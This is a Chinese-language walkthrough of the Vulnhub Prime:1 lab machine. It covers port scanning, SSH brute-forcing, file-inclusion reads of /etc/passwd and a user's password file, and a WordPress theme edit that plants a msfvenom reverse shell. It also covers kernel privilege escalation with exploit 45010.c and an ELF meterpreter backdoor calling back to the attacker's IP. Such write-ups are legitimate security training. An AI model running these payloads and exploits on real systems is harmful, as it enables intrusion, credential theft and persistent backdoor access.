靶机渗透实战基础-Vulnhub-Prime_1
靶机渗透实战基础-Vulnhub-Prime:1
主机发现&端口扫描
攻击主机IP:192.168.2.130,C段扫描:
1 | nmap -sP 192.168.2.1/24 |
发现目标主机IP地址为:192.168.2.198。
进行进攻性扫描:
1 | nmap -A 192.168.2.198 |
发现两个端口开放:
1 | PORT STATE SERVICE VERSION |
漏洞发现
搜索Apache 2.4.18漏洞:
1 | searchsploit Apache 2.4 |
并没有。
有OpenSSH,爆弱口令:
1 | hydra -C /usr/share/wordlists/legion/ssh-betterdefaultpasslist.txt 192.168.2.198 ssh |
然而并没有,回去看80端口,发现只有一张图骗,怀疑存在隐写,用wget下载:
1 | wget http://192.168.2.198:80/hacknpentest.png |
没啥东西。
目录爆破
1 | dirb http://192.168.2.198 |
除了inde.php,还有dev路由,访问:
1 | curl http://192.168.2.198/dev |
价值不大。
还有WordPress路由,访问,发现页面提示有用户名victor。
接下来爆文件:
1 | dirb http://192.168.2.198 -X .php,.txt |
有secret.txt和image.php,访问secret.txt,提示有locations.txt和需要模糊测试。
模糊测试
对image.php的传参进行模糊测试:
1 | wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt http://192.168.2.198/image.php?FUZZ |
只要chars相同就不用管,尝试过滤掉147:
1 | wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hh 147 http://192.168.2.198/image.php?FUZZ |
没东西,再试试index.php:
1 | wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hh 136 http://192.168.2.198/index.php?FUZZ |
有个好东西:参数file。访问:http://192.168.2.198/index.php?file=asdf结果报错。想到之前提示location.txt这玩意儿,尝试LFI文件包含漏洞:http://192.168.2.198/index.php?file=location.txt。
提示拿到某参数“secrettier360”???
尝试发现不是WordPress的密码,于是尝试读取passwd文件:
1 | curl http://192.168.2.198/image.php?secrettier360=/etc/passwd |
找到显眼信息:/home/saket/password.txt,继续读取该文件:
1 | curl http://192.168.2.198/image.php?secrettier360=/home/saket/password.txt |
找到了不知道啥东西:follow_the_ippsec,猜测为WordPress后台密码。
之前提示有用户victor,也可以尝试爆破用户名:
1 | wpscan --url http://192.168.2.198/wordpress --enumerate u |
尝试登录发现是对的,尝试找一个可写的文件,最终找到主题2019的secret.php可写,尝试弹shell。
内核提权
用msfvenom弹shell:
1 | msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.2.130 LPORT=7777 -s shell.php |
读取shell.php并上传,用msfconsole连接:
1 | use exploit/mutli/handler |
一个很重要的知识点:secret.php所在路径为/wordpress/wp-content/themes/twentynineteen/secret.php,访问后即连接上meterpreter。
尝试getuid和sysinfo,发现内核版本为4.10.0-28,查看有什么提权操作:
1 | searchsploit Ubuntu 4.10.0 |
找到45010.c提权操作:
1 | cp /usr/share/exploitdb/exploits/linux/local/45010.c . |
并利用meterpreter进行上传后,打开shell:
1 | upload /home/monoceros406/Desktop/CTF-Workbench/45010.c /tmp/45010.c |
进入shell后,利用本地gcc编译。如果利用攻击主机gcc编译,会发现靶机的libc版本不是一般低…
在shell中:
1 | cd /tmp |
完结散花!
瞎搞
拿root后改密码,改成abcdefg:
1 | passwd root |
在虚拟机里登进去,图片中发现一张截图,victor的密码是:victorcandoanything。
但是这个meterpreter也没啥好玩儿的,php/linux型各种操作都受限制…
造毒:
1 | msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.2.130 lport=4443 -f elf > backdoor |
然后上传:
1 | upload /home/monoceros406/Desktop/CTF-Workbench/backdoor /tmp |
目标主机运行:
1 | cd /tmp |
尽快启动新的msfconsole,进行连接:
1 | use exploit/multi/handler |
发现还是无法使用screenshot或keyscan等…